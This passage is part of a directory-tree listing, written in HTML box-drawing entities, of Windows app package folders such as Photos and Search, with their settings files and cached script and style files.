&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.ParentalControls_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.Photos_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MediaDb.v1.sqlite
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MediaDb.v1.sqlite-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MediaDb.v1.sqlite-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PhotosAppTracing_startedInBGMode.etl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.Search_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AC
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TH7LOWPQ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 7
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 12OaRJ-2U1hcmKFncIXhbX1j62g.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 5QbvUbPr5h0JJWRuMvsG58molFw.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 8jAwzw6Qsvvds_KGvS39nm1fTBg.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; aABLNT_FV45QjYQfnRHrBCAk4GU[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; appcache[1].man
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AptopUBu7_oVDubJxwvaIprW-lI[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; bHkaUYJYpLyeWL37QERwrSA6M-A.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Cup3Is1bdaUS3C5__G12HeKRFUk.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DpZSAH7iRtfJbl95939MzwjALrg.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; F-9phXC_0uAqQQFuRafyV39z6Dk.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FBodW3lwNP5Qe6iF-d8dpJdC9lc.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FgBbpIj0thGWZOh_xFnM9i4O7ek[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; h2m6AVCpDtS8Ff3ZxuDGx1A2-O8.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; heAYUxfILYlJF05e-8lkGwIhhvk.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HSjqqNAf8A6tH6cRSo4u7MnAgQo.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HTtwxidvByGPeR1IbVBmzc6JMFE[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; I9IcNC5Fm4eIVI1W7MOj8TQLJnM.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IfessBb5oalKa0BiFziddjCU6s0.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ikpPfkLjP14eKCzM16ksiFVp92Y.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Init[1].htm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; -iNIzuEypRdgRJ6xnyVHizZ3bpM.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; JfHPfqlXBkmAm0Qtf5mbiNPZs9I.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kH22K8qkhqsRJBHVREydfyCsX5Q.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Kkc0vUYaO2t8Idtv8pP1mO5kI-U.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; kNbCYqhbl7rciqSWM997NnFjqpE[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mNTNSYmdkpZ8dkFq4cRJ9JsSlUg[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; onra7PQl9o5bYT2lASI1BE4DDEs[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; p6wm2WLb8ijauB9Ev6BJn8A1qO0.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pa4SAazw9dzjA566NnHnw7sTAWk.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Q_qmYa-oymDLrKP18xwpe3q1Twg.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RGSO4sEmvYv8wsttX4XoQuFoMMM.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; syUVAYIRowNlK3WkXP45a-Eil98.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; t8nWDcgsFP2om7RRQLGAsaCDrXw.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tUCiVcVWZ-go7BLlq95YW6bKHZE[1].css
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; v5zOzwO-WGATNbZYbsbP_IKg6LU.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V62NxFhQFWhp7IHxFC6BHteG_58[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; v6GNSutG8z2AYJfNy2W0_QdViPU.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; v86e0X_ci1X8eYRZtuX_JUnLuFw.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; XF2HFdw72Rd8XFupFwNm2lLP_9M.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; XKZ41694P7XbcLcfFJwPjCvgy20.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ZBE20uhSHfCu187YygD8my6jfpU.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; zHPj2y5saY1e83_ximnrlqZqrr0.br[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 68NROCDD
